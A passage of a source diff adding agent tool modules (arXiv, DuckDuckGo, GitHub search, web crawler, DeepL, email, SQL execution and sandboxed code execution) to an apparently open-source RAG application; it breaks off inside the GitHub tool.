 #  limitations under the License.
 #
 import logging
 import os
 import time
 from abc import ABC
 import arxiv
 from agent.tools.base import ToolParamBase, ToolMeta, ToolBase
 from api.utils.api_utils import timeout
 class ArXivParam(ToolParamBase):
    """
    Define the ArXiv component parameters.
    """
    def __init__(self):
        self.meta:ToolMeta = {
            "name": "arxiv_search",
            "description": """arXiv is a free distribution service and an open-access archive for nearly 2.4 million scholarly articles in the fields of physics, mathematics, computer science, quantitative biology, quantitative finance, statistics, electrical engineering and systems science, and economics. Materials on this site are not peer-reviewed by arXiv.""",
            "parameters": {
                "query": {
                    "type": "string",
                    "description": "The search keywords to execute with arXiv. The keywords should be the most important words/terms(includes synonyms) from the original request.",
                    "default": "{sys.query}",
                    "required": True
                }
            }
        }
        super().__init__()
        self.top_n = 12
        self.sort_by = 'submittedDate'
    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.sort_by, "ArXiv Search Sort_by",
                               ['submittedDate', 'lastUpdatedDate', 'relevance'])
    def get_input_form(self) -> dict[str, dict]:
        return {
            "query": {
                "name": "Query",
                "type": "line"
            }
        }
 class ArXiv(ToolBase, ABC):
    component_name = "ArXiv"
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 12))
    def _invoke(self, **kwargs):
        if not kwargs.get("query"):
            self.set_output("formalized_content", "")
            return ""
        last_e = ""
        for _ in range(self._param.max_retries+1):
            try:
                sort_choices = {"relevance": arxiv.SortCriterion.Relevance,
                                "lastUpdatedDate": arxiv.SortCriterion.LastUpdatedDate,
                                'submittedDate': arxiv.SortCriterion.SubmittedDate}
                arxiv_client = arxiv.Client()
                search = arxiv.Search(
                    query=kwargs["query"],
                    max_results=self._param.top_n,
                    sort_by=sort_choices[self._param.sort_by]
                )
                self._retrieve_chunks(list(arxiv_client.results(search)),
                                      get_title=lambda r: r.title,
                                      get_url=lambda r: r.pdf_url,
                                      get_content=lambda r: r.summary)
                return self.output("formalized_content")
            except Exception as e:
                last_e = e
                logging.exception(f"ArXiv error: {e}")
                time.sleep(self._param.delay_after_error)
        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"ArXiv error: {last_e}"
        assert False, self.output()
    def thoughts(self) -> str:
        return """
 Keywords: {} 
 Looking for the most relevant articles.
                """.format(self.get_input().get("query", "-_-!"))
--- a/agent/tools/base.py
+++ b/agent/tools/base.py
@ -0,0 +1,171 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import logging
 import re
 import time
 from copy import deepcopy
 from functools import partial
 from typing import TypedDict, List, Any
 from agent.component.base import ComponentParamBase, ComponentBase
 from api.utils import hash_str2int
 from rag.llm.chat_model import ToolCallSession
 from rag.prompts.prompts import kb_prompt
 from rag.utils.mcp_tool_call_conn import MCPToolCallSession
 class ToolParameter(TypedDict):
    type: str
    description: str
    displayDescription: str
    enum: List[str]
    required: bool
 class ToolMeta(TypedDict):
    name: str
    displayName: str
    description: str
    displayDescription: str
    parameters: dict[str, ToolParameter]
 class LLMToolPluginCallSession(ToolCallSession):
    def __init__(self, tools_map: dict[str, object], callback: partial):
        self.tools_map = tools_map
        self.callback = callback
    def tool_call(self, name: str, arguments: dict[str, Any]) -> Any:
        assert name in self.tools_map, f"LLM tool {name} does not exist"
        if isinstance(self.tools_map[name], MCPToolCallSession):
            resp = self.tools_map[name].tool_call(name, arguments, 60)
        else:
            resp = self.tools_map[name].invoke(**arguments)
        self.callback(name, arguments, resp)
        return resp
    def get_tool_obj(self, name):
        return self.tools_map[name]
 class ToolParamBase(ComponentParamBase):
    def __init__(self):
        #self.meta:ToolMeta = None
        super().__init__()
        self._init_inputs()
        self._init_attr_by_meta()
    def _init_inputs(self):
        self.inputs = {}
        for k,p in self.meta["parameters"].items():
            self.inputs[k] = deepcopy(p)
    def _init_attr_by_meta(self):
        for k,p in self.meta["parameters"].items():
            if not hasattr(self, k):
                setattr(self, k, p.get("default"))
    def get_meta(self):
        params = {}
        for k, p in self.meta["parameters"].items():
            params[k] = {
                "type": p["type"],
                "description": p["description"]
            }
            if "enum" in p:
                params[k]["enum"] = p["enum"]
        desc = self.meta["description"]
        if hasattr(self, "description"):
            desc = self.description
        function_name = self.meta["name"]
        if hasattr(self, "function_name"):
            function_name = self.function_name
        return {
            "type": "function",
            "function": {
                "name": function_name,
                "description": desc,
                "parameters": {
                    "type": "object",
                    "properties": params,
                    "required": [k for k, p in self.meta["parameters"].items() if p["required"]]
                }
            }
        }
 class ToolBase(ComponentBase):
    def __init__(self, canvas, id, param: ComponentParamBase):
        from agent.canvas import Canvas  # Local import to avoid cyclic dependency
        assert isinstance(canvas, Canvas), "canvas must be an instance of Canvas"
        self._canvas = canvas
        self._id = id
        self._param = param
        self._param.check()
    def get_meta(self) -> dict[str, Any]:
        return self._param.get_meta()
    def invoke(self, **kwargs):
        self.set_output("_created_time", time.perf_counter())
        try:
            res = self._invoke(**kwargs)
        except Exception as e:
            self._param.outputs["_ERROR"] = {"value": str(e)}
            logging.exception(e)
            res = str(e)
        self._param.debug_inputs = []
        self.set_output("_elapsed_time", time.perf_counter() - self.output("_created_time"))
        return res
    def _retrieve_chunks(self, res_list: list, get_title, get_url, get_content, get_score=None):
        chunks = []
        aggs = []
        for r in res_list:
            content = get_content(r)
            if not content:
                continue
            content = re.sub(r"!?\[[a-z]+\]\(data:image/png;base64,[ 0-9A-Za-z/_=+-]+\)", "", content)
            content = content[:10000]
            if not content:
                continue
            id = str(hash_str2int(content))
            title = get_title(r)
            url = get_url(r)
            score = get_score(r) if get_score else 1
            chunks.append({
                "chunk_id": id,
                "content": content,
                "doc_id": id,
                "docnm_kwd": title,
                "similarity": score,
                "url": url
            })
            aggs.append({
                "doc_name": title,
                "doc_id": id,
                "count": 1,
                "url": url
            })
        self._canvas.add_refernce(chunks, aggs)
        self.set_output("formalized_content", "\n".join(kb_prompt({"chunks": chunks, "doc_aggs": aggs}, 200000, True)))
    def thoughts(self) -> str:
        return self._canvas.get_component_name(self._id) + " is running..."
--- a/agent/tools/code_exec.py
+++ b/agent/tools/code_exec.py
@ -0,0 +1,193 @@
 #
 #  Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import base64
 import logging
 import os
 from abc import ABC
 from enum import StrEnum
 from typing import Optional
 from pydantic import BaseModel, Field, field_validator
 from agent.tools.base import ToolParamBase, ToolBase, ToolMeta
 from api import settings
 from api.utils.api_utils import timeout
 class Language(StrEnum):
    PYTHON = "python"
    NODEJS = "nodejs"
 class CodeExecutionRequest(BaseModel):
    code_b64: str = Field(..., description="Base64 encoded code string")
    language: str = Field(default=Language.PYTHON.value, description="Programming language")
    arguments: Optional[dict] = Field(default={}, description="Arguments")
    @field_validator("code_b64")
    @classmethod
    def validate_base64(cls, v: str) -> str:
        try:
            base64.b64decode(v, validate=True)
            return v
        except Exception as e:
            raise ValueError(f"Invalid base64 encoding: {str(e)}")
    @field_validator("language", mode="before")
    @classmethod
    def normalize_language(cls, v) -> str:
        if isinstance(v, str):
            low = v.lower()
            if low in ("python", "python3"):
                return "python"
            elif low in ("javascript", "nodejs"):
                return "nodejs"
        raise ValueError(f"Unsupported language: {v}")
 class CodeExecParam(ToolParamBase):
    """
    Define the code sandbox component parameters.
    """
    def __init__(self):
        self.meta:ToolMeta = {
            "name": "execute_code",
            "description": """
 This tool has a sandbox that can execute code written in 'Python'/'Javascript'. It recieves a piece of code and return a Json string.
 Here's a code example for Python(`main` function MUST be included):
 def main(arg1: str, arg2: str) -> dict:
    return {
        "result": arg1 + arg2,
    }
 Here's a code example for Javascript(`main` function MUST be included and exported):
 const axios = require('axios');
 async function main(args) {
  try {
    const response = await axios.get('https://github.com/infiniflow/ragflow');
    console.log('Body:', response.data);
  } catch (error) {
    console.error('Error:', error.message);
  }
 }
 module.exports = { main };
            """,
            "parameters": {
                "lang": {
                    "type": "string",
                    "description": "The programming language of this piece of code.",
                    "enum": ["python", "javascript"],
                    "required": True,
                },
                "script": {
                    "type": "string",
                    "description": "A piece of code in right format. There MUST be main function.",
                    "required": True
                }
            }
        }
        super().__init__()
        self.lang = Language.PYTHON.value
        self.script = "def main(arg1: str, arg2: str) -> dict: return {\"result\": arg1 + arg2}"
        self.arguments = {}
        self.outputs = {"result": {"value": "", "type": "string"}}
    def check(self):
        self.check_valid_value(self.lang, "Support languages", ["python", "python3", "nodejs", "javascript"])
        self.check_empty(self.script, "Script")
    def get_input_form(self) -> dict[str, dict]:
        res = {}
        for k, v in self.arguments.items():
            res[k] = {
                "type": "line",
                "name": k
            }
        return res
 class CodeExec(ToolBase, ABC):
    component_name = "CodeExec"
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 10*60))
    def _invoke(self, **kwargs):
        lang = kwargs.get("lang", self._param.lang)
        script = kwargs.get("script", self._param.script)
        arguments = {}
        for k, v in self._param.arguments.items():
            if kwargs.get(k):
                arguments[k] = kwargs[k]
                continue
            arguments[k] = self._canvas.get_variable_value(v) if v else None
        self._execute_code(
            language=lang,
            code=script,
            arguments=arguments
        )
    def _execute_code(self, language: str, code: str, arguments: dict):
        import requests
        try:
            code_b64 = self._encode_code(code)
            code_req = CodeExecutionRequest(code_b64=code_b64, language=language, arguments=arguments).model_dump()
        except Exception as e:
            self.set_output("_ERROR", "construct code request error: " + str(e))
        try:
            resp = requests.post(url=f"http://{settings.SANDBOX_HOST}:9385/run", json=code_req, timeout=10)
            logging.info(f"http://{settings.SANDBOX_HOST}:9385/run", code_req, resp.status_code)
            if resp.status_code != 200:
                resp.raise_for_status()
            body = resp.json()
            if body:
                stderr = body.get("stderr")
                if stderr:
                    self.set_output("_ERROR", stderr)
                    return
                try:
                    rt = eval(body.get("stdout", ""))
                except Exception:
                    rt = body.get("stdout", "")
                logging.info(f"http://{settings.SANDBOX_HOST}:9385/run -> {rt}")
                if isinstance(rt, tuple):
                    for i, (k, o) in enumerate(self._param.outputs.items()):
                        if k.find("_") == 0:
                            continue
                        o["value"] = rt[i]
                elif isinstance(rt, dict):
                    for i, (k, o) in enumerate(self._param.outputs.items()):
                        if k not in rt or k.find("_") == 0:
                            continue
                        o["value"] = rt[k]
                else:
                    for i, (k, o) in enumerate(self._param.outputs.items()):
                        if k.find("_") == 0:
                            continue
                        o["value"] = rt
            else:
                self.set_output("_ERROR", "There is no response from sandbox")
        except Exception as e:
            self.set_output("_ERROR", "Exception executing code: " + str(e))
        return self.output()
    def _encode_code(self, code: str) -> str:
        return base64.b64encode(code.encode("utf-8")).decode("utf-8")
    def thoughts(self) -> str:
        return "Running a short script to process data."
--- a/agent/tools/crawler.py
+++ b/agent/tools/crawler.py
@ -0,0 +1,68 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 from abc import ABC
 import asyncio
 from crawl4ai import AsyncWebCrawler
 from agent.tools.base import ToolParamBase, ToolBase
 from api.utils.web_utils import is_valid_url
 class CrawlerParam(ToolParamBase):
    """
    Define the Crawler component parameters.
    """
    def __init__(self):
        super().__init__()
        self.proxy = None
        self.extract_type = "markdown"
    def check(self):
        self.check_valid_value(self.extract_type, "Type of content from the crawler", ['html', 'markdown', 'content'])
 class Crawler(ToolBase, ABC):
    component_name = "Crawler"
    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not is_valid_url(ans):
            return Crawler.be_output("URL not valid")
        try:
            result = asyncio.run(self.get_web(ans))
            return Crawler.be_output(result)
        except Exception as e:
            return Crawler.be_output(f"An unexpected error occurred: {str(e)}")
    async def get_web(self, url):
        proxy = self._param.proxy if self._param.proxy else None
        async with AsyncWebCrawler(verbose=True, proxy=proxy) as crawler:
            result = await crawler.arun(
                url=url,
                bypass_cache=True
            )
            if self._param.extract_type == 'html':
                return result.cleaned_html
            elif self._param.extract_type == 'markdown':
                return result.markdown
            elif self._param.extract_type == 'content':
                result.extracted_content
            return result.markdown
--- a/agent/tools/deepl.py
+++ b/agent/tools/deepl.py
@ -0,0 +1,61 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 from abc import ABC
 from agent.component.base import ComponentBase, ComponentParamBase
 import deepl
 class DeepLParam(ComponentParamBase):
    """
    Define the DeepL component parameters.
    """
    def __init__(self):
        super().__init__()
        self.auth_key = "xxx"
        self.parameters = []
        self.source_lang = 'ZH'
        self.target_lang = 'EN-GB'
    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.source_lang, "Source language",
                               ['AR', 'BG', 'CS', 'DA', 'DE', 'EL', 'EN', 'ES', 'ET', 'FI', 'FR', 'HU', 'ID', 'IT',
                                'JA', 'KO', 'LT', 'LV', 'NB', 'NL', 'PL', 'PT', 'RO', 'RU', 'SK', 'SL', 'SV', 'TR',
                                'UK', 'ZH'])
        self.check_valid_value(self.target_lang, "Target language",
                               ['AR', 'BG', 'CS', 'DA', 'DE', 'EL', 'EN-GB', 'EN-US', 'ES', 'ET', 'FI', 'FR', 'HU',
                                'ID', 'IT', 'JA', 'KO', 'LT', 'LV', 'NB', 'NL', 'PL', 'PT-BR', 'PT-PT', 'RO', 'RU',
                                'SK', 'SL', 'SV', 'TR', 'UK', 'ZH'])
 class DeepL(ComponentBase, ABC):
    component_name = "GitHub"
    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return DeepL.be_output("")
        try:
            translator = deepl.Translator(self._param.auth_key)
            result = translator.translate_text(ans, source_lang=self._param.source_lang,
                                               target_lang=self._param.target_lang)
            return DeepL.be_output(result.text)
        except Exception as e:
            DeepL.be_output("**Error**:" + str(e))
--- a/agent/tools/duckduckgo.py
+++ b/agent/tools/duckduckgo.py
@ -0,0 +1,120 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import logging
 import os
 import time
 from abc import ABC
 from duckduckgo_search import DDGS
 from agent.tools.base import ToolMeta, ToolParamBase, ToolBase
 from api.utils.api_utils import timeout
 class DuckDuckGoParam(ToolParamBase):
    """
    Define the DuckDuckGo component parameters.
    """
    def __init__(self):
        self.meta:ToolMeta = {
            "name": "duckduckgo_search",
            "description": "DuckDuckGo is a search engine focused on privacy. It offers search capabilities for web pages, images, and provides translation services. DuckDuckGo also features a private AI chat interface, providing users with an AI assistant that prioritizes data protection.",
            "parameters": {
                "query": {
                    "type": "string",
                    "description": "The search keywords to execute with DuckDuckGo. The keywords should be the most important words/terms(includes synonyms) from the original request.",
                    "default": "{sys.query}",
                    "required": True
                },
                "channel": {
                    "type": "string",
                    "description": "default:general. The category of the search. `news` is useful for retrieving real-time updates, particularly about politics, sports, and major current events covered by mainstream media sources. `general` is for broader, more general-purpose searches that may include a wide range of sources.",
                    "enum": ["general", "news"],
                    "default": "general",
                    "required": False,
                },
            }
        }
        super().__init__()
        self.top_n = 10
        self.channel = "text"
    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.channel, "Web Search or News", ["text", "news"])
    def get_input_form(self) -> dict[str, dict]:
        return {
            "query": {
                "name": "Query",
                "type": "line"
            },
            "channel": {
                "name": "Channel",
                "type": "options",
                "value": "general",
                "options": ["general", "news"]
            }
        }
 class DuckDuckGo(ToolBase, ABC):
    component_name = "DuckDuckGo"
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 12))
    def _invoke(self, **kwargs):
        if not kwargs.get("query"):
            self.set_output("formalized_content", "")
            return ""
        last_e = ""
        for _ in range(self._param.max_retries+1):
            try:
                if kwargs.get("topic", "general") == "general":
                    with DDGS() as ddgs:
                        # {'title': '', 'href': '', 'body': ''}
                        duck_res = ddgs.text(kwargs["query"], max_results=self._param.top_n)
                        self._retrieve_chunks(duck_res,
                                              get_title=lambda r: r["title"],
                                              get_url=lambda r: r.get("href", r.get("url")),
                                              get_content=lambda r: r["body"])
                        self.set_output("json", duck_res)
                        return self.output("formalized_content")
                else:
                    with DDGS() as ddgs:
                        # {'date': '', 'title': '', 'body': '', 'url': '', 'image': '', 'source': ''}
                        duck_res = ddgs.news(kwargs["query"], max_results=self._param.top_n)
                        self._retrieve_chunks(duck_res,
                                              get_title=lambda r: r["title"],
                                              get_url=lambda r: r.get("href", r.get("url")),
                                              get_content=lambda r: r["body"])
                        self.set_output("json", duck_res)
                        return self.output("formalized_content")
            except Exception as e:
                last_e = e
                logging.exception(f"DuckDuckGo error: {e}")
                time.sleep(self._param.delay_after_error)
        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"DuckDuckGo error: {last_e}"
        assert False, self.output()
    def thoughts(self) -> str:
        return """
 Keywords: {} 
 Looking for the most relevant articles.
                """.format(self.get_input().get("query", "-_-!"))
--- a/agent/tools/email.py
+++ b/agent/tools/email.py
@ -0,0 +1,215 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import os
 import time
 from abc import ABC
 import json
 import smtplib
 import logging
 from email.mime.text import MIMEText
 from email.mime.multipart import MIMEMultipart
 from email.header import Header
 from email.utils import formataddr
 from agent.tools.base import ToolParamBase, ToolBase, ToolMeta
 from api.utils.api_utils import timeout
 class EmailParam(ToolParamBase):
    """
    Define the Email component parameters.
    """
    def __init__(self):
        self.meta:ToolMeta = {
            "name": "email",
            "description": "The email is a method of electronic communication for sending and receiving information through the Internet. This tool helps users to send emails to one person or to multiple recipients with support for CC, BCC, file attachments, and markdown-to-HTML conversion.",
            "parameters": {
                "to_email": {
                    "type": "string",
                    "description": "The target email address.",
                    "default": "{sys.query}",
                    "required": True
                },
                "cc_email": {
                    "type": "string",
                    "description": "The other email addresses needs to be send to. Comma splited.",
                    "default": "",
                    "required": False
                },
                "content": {
                    "type": "string",
                    "description": "The content of the email.",
                    "default": "",
                    "required": False
                },
                "subject": {
                    "type": "string",
                    "description": "The subject/title of the email.",
                    "default": "",
                    "required": False
                }
            }
        }
        super().__init__()
        # Fixed configuration parameters
        self.smtp_server = ""  # SMTP server address
        self.smtp_port = 465  # SMTP port
        self.email = ""  # Sender email
        self.password = ""  # Email authorization code
        self.sender_name = ""  # Sender name
    def check(self):
        # Check required parameters
        self.check_empty(self.smtp_server, "SMTP Server")
        self.check_empty(self.email, "Email")
        self.check_empty(self.password, "Password")
        self.check_empty(self.sender_name, "Sender Name")
    def get_input_form(self) -> dict[str, dict]:
        return {
            "to_email": {
                "name": "To ",
                "type": "line"
            },
            "subject": {
                "name": "Subject",
                "type": "line",
                "optional": True
            },
            "cc_email": {
                "name": "CC To",
                "type": "line",
                "optional": True
            },
        }
 class Email(ToolBase, ABC):
    component_name = "Email"
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 60))
    def _invoke(self, **kwargs):
        if not kwargs.get("to_email"):
            self.set_output("success", False)
            return ""
        last_e = ""
        for _ in range(self._param.max_retries+1):
            try:
                # Parse JSON string passed from upstream
                email_data = kwargs
                # Validate required fields
                if "to_email" not in email_data:
                    return Email.be_output("Missing required field: to_email")
                # Create email object
                msg = MIMEMultipart('alternative')
                # Properly handle sender name encoding
                msg['From'] = formataddr((str(Header(self._param.sender_name,'utf-8')), self._param.email))
                msg['To'] = email_data["to_email"]
                if email_data.get("cc_email"):
                    msg['Cc'] = email_data["cc_email"]
                msg['Subject'] = Header(email_data.get("subject", "No Subject"), 'utf-8').encode()
                # Use content from email_data or default content
                email_content = email_data.get("content", "No content provided")
                # msg.attach(MIMEText(email_content, 'plain', 'utf-8'))
                msg.attach(MIMEText(email_content, 'html', 'utf-8'))
                # Connect to SMTP server and send
                logging.info(f"Connecting to SMTP server {self._param.smtp_server}:{self._param.smtp_port}")
                context = smtplib.ssl.create_default_context()
                with smtplib.SMTP(self._param.smtp_server, self._param.smtp_port) as server:
                    server.ehlo()
                    server.starttls(context=context)
                    server.ehlo()
                    # Login
                    logging.info(f"Attempting to login with email: {self._param.email}")
                    server.login(self._param.email, self._param.password)
                    # Get all recipient list
                    recipients = [email_data["to_email"]]
                    if email_data.get("cc_email"):
                        recipients.extend(email_data["cc_email"].split(','))
                    # Send email
                    logging.info(f"Sending email to recipients: {recipients}")
                    try:
                        server.send_message(msg, self._param.email, recipients)
                        success = True
                    except Exception as e:
                        logging.error(f"Error during send_message: {str(e)}")
                        # Try alternative method
                        server.sendmail(self._param.email, recipients, msg.as_string())
                        success = True
                    try:
                        server.quit()
                    except Exception as e:
                        # Ignore errors when closing connection
                        logging.warning(f"Non-fatal error during connection close: {str(e)}")
                self.set_output("success", success)
                return success
            except json.JSONDecodeError:
                error_msg = "Invalid JSON format in input"
                logging.error(error_msg)
                self.set_output("_ERROR", error_msg)
                self.set_output("success", False)
                return False
            except smtplib.SMTPAuthenticationError:
                error_msg = "SMTP Authentication failed. Please check your email and authorization code."
                logging.error(error_msg)
                self.set_output("_ERROR", error_msg)
                self.set_output("success", False)
                return False
            except smtplib.SMTPConnectError:
                error_msg = f"Failed to connect to SMTP server {self._param.smtp_server}:{self._param.smtp_port}"
                logging.error(error_msg)
                last_e = error_msg
                time.sleep(self._param.delay_after_error)
            except smtplib.SMTPException as e:
                error_msg = f"SMTP error occurred: {str(e)}"
                logging.error(error_msg)
                last_e = error_msg
                time.sleep(self._param.delay_after_error)
            except Exception as e:
                error_msg = f"Unexpected error: {str(e)}"
                logging.error(error_msg)
                self.set_output("_ERROR", error_msg)
                self.set_output("success", False)
                return False
        if last_e:
            self.set_output("_ERROR", str(last_e))
            return False
        assert False, self.output()
    def thoughts(self) -> str:
        inputs = self.get_input()
        return """
 To: {}
 Subject: {}
 Your email is on its way—sit tight!
 """.format(inputs.get("to_email", "-_-!"), inputs.get("subject", "-_-!"))
--- a/agent/tools/exesql.py
+++ b/agent/tools/exesql.py
@ -0,0 +1,132 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import os
 from abc import ABC
 import pandas as pd
 import pymysql
 import psycopg2
 import pyodbc
 from agent.tools.base import ToolParamBase, ToolBase, ToolMeta
 from api.utils.api_utils import timeout
 class ExeSQLParam(ToolParamBase):
    """
    Define the ExeSQL component parameters.
    """
    def __init__(self):
        self.meta:ToolMeta = {
            "name": "execute_sql",
            "description": "This is a tool that can execute SQL.",
            "parameters": {
                "sql": {
                    "type": "string",
                    "description": "The SQL needs to be executed.",
                    "default": "{sys.query}",
                    "required": True
                }
            }
        }
        super().__init__()
        self.db_type = "mysql"
        self.database = ""
        self.username = ""
        self.host = ""
        self.port = 3306
        self.password = ""
        self.max_records = 1024
    def check(self):
        self.check_valid_value(self.db_type, "Choose DB type", ['mysql', 'postgresql', 'mariadb', 'mssql'])
        self.check_empty(self.database, "Database name")
        self.check_empty(self.username, "database username")
        self.check_empty(self.host, "IP Address")
        self.check_positive_integer(self.port, "IP Port")
        self.check_empty(self.password, "Database password")
        self.check_positive_integer(self.max_records, "Maximum number of records")
        if self.database == "rag_flow":
            if self.host == "ragflow-mysql":
                raise ValueError("For the security reason, it dose not support database named rag_flow.")
            if self.password == "infini_rag_flow":
                raise ValueError("For the security reason, it dose not support database named rag_flow.")
    def get_input_form(self) -> dict[str, dict]:
        return {
            "sql": {
                "name": "SQL",
                "type": "line"
            }
        }
 class ExeSQL(ToolBase, ABC):
    component_name = "ExeSQL"
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 60))
    def _invoke(self, **kwargs):
        sql = kwargs.get("sql")
        if not sql:
            raise Exception("SQL for `ExeSQL` MUST not be empty.")
        sqls = sql.split(";")
        if self._param.db_type in ["mysql", "mariadb"]:
            db = pymysql.connect(db=self._param.database, user=self._param.username, host=self._param.host,
                                 port=self._param.port, password=self._param.password)
        elif self._param.db_type == 'postgresql':
            db = psycopg2.connect(dbname=self._param.database, user=self._param.username, host=self._param.host,
                                  port=self._param.port, password=self._param.password)
        elif self._param.db_type == 'mssql':
            conn_str = (
                    r'DRIVER={ODBC Driver 17 for SQL Server};'
                    r'SERVER=' + self._param.host + ',' + str(self._param.port) + ';'
                    r'DATABASE=' + self._param.database + ';'
                    r'UID=' + self._param.username + ';'
                    r'PWD=' + self._param.password
            )
            db = pyodbc.connect(conn_str)
        try:
            cursor = db.cursor()
        except Exception as e:
            raise Exception("Database Connection Failed! \n" + str(e))
        sql_res = []
        formalized_content = []
        for single_sql in sqls:
            single_sql = single_sql.replace('```','')
            if not single_sql:
                continue
            cursor.execute(single_sql)
            if cursor.rowcount == 0:
                sql_res.append({"content": "No record in the database!"})
                break
            if self._param.db_type == 'mssql':
                single_res = pd.DataFrame.from_records(cursor.fetchmany(self._param.max_records),
                                                       columns=[desc[0] for desc in cursor.description])
            else:
                single_res = pd.DataFrame([i for i in cursor.fetchmany(self._param.max_records)])
                single_res.columns = [i[0] for i in cursor.description]
            sql_res.append(single_res.to_dict(orient='records'))
            formalized_content.append(single_res.to_markdown(index=False, floatfmt=".6f"))
        self.set_output("json", sql_res)
        self.set_output("formalized_content", "\n\n".join(formalized_content))
        return self.output("formalized_content")
    def thoughts(self) -> str:
        return "Query sent—waiting for the data."
--- a/agent/tools/github.py
+++ b/agent/tools/github.py
@ -0,0 +1,91 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import logging
 import os
 import time
 from abc import ABC
 import requests
 from agent.tools.base import ToolParamBase, ToolMeta, ToolBase
 from api.utils.api_utils import timeout
 class GitHubParam(ToolParamBase):
    """
    Define the GitHub component parameters.
    """
    def __init__(self):
        self.meta:ToolMeta = {
            "name": "github_search",
            "description": """GitHub repository search is a feature that enables users to find specific repositories on the GitHub platform. This search functionality allows users to locate projects, codebases, and other content hosted on GitHub based on various criteria.""",
            "parameters": {
                "query": {
                    "type": "string",
                    "description": "The search keywords to execute with GitHub. The keywords should be the most important words/terms(includes synonyms) from the original request.",
                    "default": "{sys.query}",
                    "required": True
                }
            }
        }
        super().__init__()
        self.top_n = 10
    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
    def get_input_form(self) -> dict[str, dict]:
        return {
            "query": {
                "name": "Query",
                "type": "line"
            }
        }
 class GitHub(ToolBase, ABC):
    component_name = "GitHub"
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 12))
    def _invoke(self, **kwargs):
        if not kwargs.get("query"):
            self.set_output("formalized_content", "")
            return ""
        last_e = ""
        for _ in range(self._param.max_retries+1):
            try:
